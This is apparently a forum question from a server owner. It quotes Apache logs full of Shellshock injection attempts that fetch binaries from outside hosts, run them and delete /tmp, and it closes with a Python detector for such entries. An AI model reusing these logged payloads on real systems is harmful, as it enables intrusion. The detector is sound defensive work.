So after setting up a new server with just ssh (public key only) and a webserver which just serves one index.html, I left for the weekend. Logging in on Monday, I see this type of thing in my httpd access_logs:
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 215 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
and
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
and lots more of the sort. This China.Z guy in particular was very insistent. I basically understand what this is, that they are probing my machine and trying to get info about it (right?), but:
- during the weekend, when there should have been no traffic on the machine (as I said, there is nothing running on it), there were about 200 MB of outbound traffic
- httpd was restarted during this time; as far as I can tell, that shouldn't have happened
- some of these requests returned 200 (the "/" ones for instance), should I be worried?
These two examples are indeed larger tries, with many requests from the same IP, but there are many others with just one request per IP.
So, should I worry about this? I've shut down my Apache and also closed the relevant ports in the firewall, but I will need Apache running on this machine. Also, is there something I can / should do to prevent this?
Also: this machine is internet-facing and has a fixed IP, I'm guessing that's why I'm getting pounded.
Thanks :)
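As an added example (not part of the original question), a small detector for entries like the ones above: it parses Apache combined-format lines, flags the Shellshock marker `() {` in the Referer or User-Agent header, pulls out the stage-2 download URLs to search for in egress or proxy logs, and records whether a probe hit a CGI path with a 200. The log lines embedded in it are constructed placeholders in the same shape as the post's entries, not the post's own IPs or hosts.

```python
import re

# Apache "combined" log line; quoted fields may contain \" escapes, so they are matched escape-aware.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"\s*$')
SHELLSHOCK = re.compile(r'\(\)\s*\{')  # Shellshock marker: a bash function definition opening a header value
URL = re.compile(r'https?://[^\s"\'\\]+')

# Constructed samples in the shape of the post's entries; IPs and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 '
    '"() { :;} ;echo;/usr/local/bin/php -r \'$a = \\"http://stage2.example/Help1\\";\'" "-"',
    '192.0.2.20 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 '
    '"() { :; }; /bin/bash -c \\"wget http://192.0.2.20:9992/dl -O /tmp/x\\"" '
    '"() { :; }; /bin/bash -c \\"wget http://192.0.2.20:9992/dl -O /tmp/x\\""',
    '198.51.100.5 - - [07/Apr/2015:09:00:00 +0200] "GET /index.html HTTP/1.1" 200 66 "-" "Mozilla/5.0"',
]

def find_shellshock(lines):
    """One record per request carrying the marker in Referer or User-Agent."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        rec = m.groupdict()
        headers = [f for f in ("referer", "agent") if SHELLSHOCK.search(rec[f])]
        if not headers:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else rec["request"]
        hits.append({
            "ip": rec["ip"], "path": path, "status": int(rec["status"]), "headers": headers,
            # stage-2 URLs: what to look for in egress/proxy logs to tell a probe from a fetch
            "urls": sorted({u for f in headers for u in URL.findall(rec[f])}),
            # Executes only if a CGI handler passes the header to bash: a 200 from the static
            # handler for "/" is index.html being served, a 404 on a .cgi path means nothing ran.
            "cgi_path": path.endswith(".cgi") or path.startswith("/cgi-"),
        })
    return hits

def summarize(hits):
    per_ip, urls = {}, set()
    for h in hits:
        per_ip[h["ip"]] = per_ip.get(h["ip"], 0) + 1
        urls.update(h["urls"])
    return {"per_ip": per_ip, "stage2_urls": sorted(urls),
            "reached_cgi": [h for h in hits if h["cgi_path"] and h["status"] == 200]}
```

Run it over a real access_log with `find_shellshock(open("access_log"))`; anything in `reached_cgi`, or a stage-2 URL showing up in outbound connection logs, is the signal that a probe was more than noise.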